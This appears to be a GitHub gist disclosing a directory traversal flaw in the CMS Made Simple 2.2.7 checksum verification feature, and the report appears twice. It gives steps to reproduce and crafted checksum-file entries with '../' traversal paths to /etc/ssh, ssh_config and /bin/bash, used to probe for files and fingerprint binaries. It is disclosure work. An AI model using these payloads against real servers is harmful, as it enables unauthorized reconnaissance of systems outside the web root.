0xn1k5/gist:ef4c7c7a26c7d8a803ef3a85f1000c98

## gistfile1.txt
Issue Description:
CMS Made Simple web application has the feature which allows the admin user to download a checksum file which can be used to verify the integrity of files in case of any hacking attempt. It was observed that the user can upload a custom checksum verification file to identify the valid directory and files outside the website installation directory using directory traversal technique.

Issue verified on version: CMS Made Simple V 2.2.7 (latest), earlier version may also be affected
Download Link: http://s3.amazonaws.com/cmsms/downloads/14144/cmsms-2.2.7-install.zip
Vendor Site:  https://www.cmsmadesimple.org/about/cms-made-simple/

Risk:
It may allow the user to verify the applications installed by probing known files and directories.
In case of default installations, It is also possible to fingerprint the known binaries by comparing the md5 hash to identify the application/binary version.

Steps to reproduce the issue:

1) Login to admin dashboard using below url or navigate to "Site Admin" > "System Verification" > "Perform Validation"

     http://target/path/admin/checksum.php?__c=fde83629cd9b67f8911

2) Download the checksum file and upload the modified checksum file having below entry:

Case 1: If Directory exists - Output: "All Checksum match"

c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh

Case 2: If Directory doesn't exists - Output: "1 File not found"

c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh2

Case 3: If File exists - Output:  "1 Files failed md5sum check"

c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh/ssh_config

Case 4: If File doesn't exists -   Output: "1 File not found"

c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh/ssh_config_no_file

3) The checksum values on left side is made using below formula. In case of default installations, md5 checksum of  /lib/version.php and index.php files can identified via test setup and combined with md5sum of known binary be used to probe the server.

Code Snippet:

$salt = md5_file($config['root_path']."/lib/version.php").md5_file($config['root_path']."/index.php");
:
:
$md5 = md5($salt.md5_file($fn))

Case: Verifying checksum of /bin/bash - Output: "All checksums match those in the uploaded file"

71fdfce0a76d11f6db3e3ac730bf223a--::--/modules/Search/templates/../../../../../../../bin/bash
	Issue Description:
	CMS Made Simple web application has the feature which allows the admin user to download a checksum file which can be used to verify the integrity of files in case of any hacking attempt. It was observed that the user can upload a custom checksum verification file to identify the valid directory and files outside the website installation directory using directory traversal technique.

	Issue verified on version: CMS Made Simple V 2.2.7 (latest), earlier version may also be affected
	Download Link: http://s3.amazonaws.com/cmsms/downloads/14144/cmsms-2.2.7-install.zip
	Vendor Site: https://www.cmsmadesimple.org/about/cms-made-simple/

	Risk:
	It may allow the user to verify the applications installed by probing known files and directories.
	In case of default installations, It is also possible to fingerprint the known binaries by comparing the md5 hash to identify the application/binary version.

	Steps to reproduce the issue:

	1) Login to admin dashboard using below url or navigate to "Site Admin" > "System Verification" > "Perform Validation"

	http://target/path/admin/checksum.php?__c=fde83629cd9b67f8911

	2) Download the checksum file and upload the modified checksum file having below entry:

	Case 1: If Directory exists - Output: "All Checksum match"

	c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh

	Case 2: If Directory doesn't exists - Output: "1 File not found"

	c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh2

	Case 3: If File exists - Output: "1 Files failed md5sum check"

	c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh/ssh_config

	Case 4: If File doesn't exists - Output: "1 File not found"

	c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh/ssh_config_no_file

	3) The checksum values on left side is made using below formula. In case of default installations, md5 checksum of /lib/version.php and index.php files can identified via test setup and combined with md5sum of known binary be used to probe the server.

	Code Snippet:

	$salt = md5_file($config['root_path']."/lib/version.php").md5_file($config['root_path']."/index.php");
	:
	:
	$md5 = md5($salt.md5_file($fn))

	Case: Verifying checksum of /bin/bash - Output: "All checksums match those in the uploaded file"

	71fdfce0a76d11f6db3e3ac730bf223a--::--/modules/Search/templates/../../../../../../../bin/bash